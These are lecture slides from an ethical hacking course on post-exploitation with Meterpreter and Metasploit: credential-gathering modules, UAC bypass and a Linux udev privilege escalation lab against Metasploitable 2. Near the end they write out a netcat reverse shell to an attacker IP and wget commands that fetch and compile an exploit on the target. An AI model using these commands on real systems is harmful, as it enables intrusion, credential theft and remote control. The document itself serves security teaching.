CNIT 124 Ch 13: Post Exploitation (Part 1)
CNIT 124: Advanced Ethical Hacking
Ch 13: Post Exploitation Part 1
Rev. 11-8-17
Topics in This Lecture
• Meterpreter
• Meterpreter Scripts
• Metasploit Post-Exploitation Modules
• Railgun
• Local Privilege Escalation
Topics in the Next Lecture
• Local Information Gathering
• Lateral Movement
• Pivoting
• Persistence
Meterpreter
Help
• help at meterpreter prompt – Shows all meterpreter commands
• command -h – Help about a specific command
• help command – Help about a specific command
Controlling Metasploit Sessions
• sessions – lists sessions
• sessions -i 1 – Starts interaction with session 1
• background – preserves a session, returns to the msf> prompt
• exit – closes a Meterpreter session
Upload
• Must use two backslashes to represent one backslash in the Windows path – "escaping" in Linux
Windows Binaries in Kali 2
Project 15: RAM Scraping
Meterpreter Scripts
Deprecated
AutoRunScript
Getting Help
• run script -h
• ps lists running processes on target
• Useful to choose a migration target
• run migrate -p 1144
Prefetch
• Prefetch shows last 128 programs used
• Useful for forensics
process_memdump
persistence
virusscan_bypass
Other Interesting Scripts
• arp_scanner -- fast host discovery
• killav -- no information in help
Metasploit Post-Exploitation Modules
Directory Structure
post/windows/gather
bitcoin_jacker
netlm_downgrade
enum_logged_on_users
Gathering Credentials
Autologon Password
Not On By Default
sso (MimiKatz)
On By Default ☺
Gather Modules
More Gather Modules
CheckVM
It Works!
BitLocker Recovery Passwords
LSA Secrets!
Works on Server 2008!
memory_grep
Looks Good But Fails
• An alternative to using MimiKatz
• Metasploit SMB Listener (Link Ch 13b)
Phishing
Fails on Win 7 and 2008
• Won't run at all on Win 2008
• On Win 7, this box pops up all the time but the password never appears in Metasploit
• Must restart Windows to make it stop
enum_ie
Fails
• Gets no passwords or cookies from Win 7 or Win 2008
• Does get some Web history links from IE 7 on Win 2008
Management Modules
inject_ca
• Subverts HTTPS ☺
MS SQL Auth Bypass
Forensic Image of Target
• Harvest deleted files
Exploit PXE Pre-eXecution Boot
Remote Packet Capture
Look in Shadow Copies (Restore Points)
Find Open Outgoing Ports
Find Wireless Networks
Steal WPA Keys
Railgun
Allows Direct Access to Windows APIs
• API: Application Program Interface
• irb drops into a Ruby shell
• client.railgun.shell32.IsUserAnAdmin
• Tells the Ruby interpreter to use Railgun to access the IsUserAnAdmin function of shell32.dll
reverse_lookup uses Railgun
Local Privilege Escalation
getsystem
• Tries to elevate to SYSTEM on Windows
• rev2self undoes this escalation
User Account Control (UAC)
• Pops up when something needs administrator privileges
UAC Blocks getsystem
• On Win 7
Bypassing UAC
Process Injection
Worked on Win 7!
Udev Privilege Escalation on Linux
• uname -a to find kernel version
• lsb_release -a to find Ubuntu version
• udevadm --version
Searching the Exploitdb Repository
• searchsploit
Recent Ubuntu Exploits
8572.c
Exploit Process
• On Kali
• ln -s /usr/share/exploitdb/platforms/linux/local/ /var/www/html/
• On Metasploitable 2
• cd /tmp
• wget http://172.16.1.188/local/8572.c
• gcc -o 8572 8572.c
Exploit Process
• On Kali
• nano /var/www/html/run
• #!/bin/bash
• nc 172.16.1.188 12345 -e /bin/bash
• nc -lvp 12345
Exploit Process
• On Metasploitable 2
• cd /tmp
• wget http://172.16.1.188/run
Exploit Process
• On Metasploitable 2
• cat /proc/net/netlink
• ps aux | grep udev
• ./8572 2738
Exploit Process
• gcc must be installed on target Linux system
• Put 8572.c in /var/www/html on Kali
• Download it to target system with wget
• Compile there and run
Escalation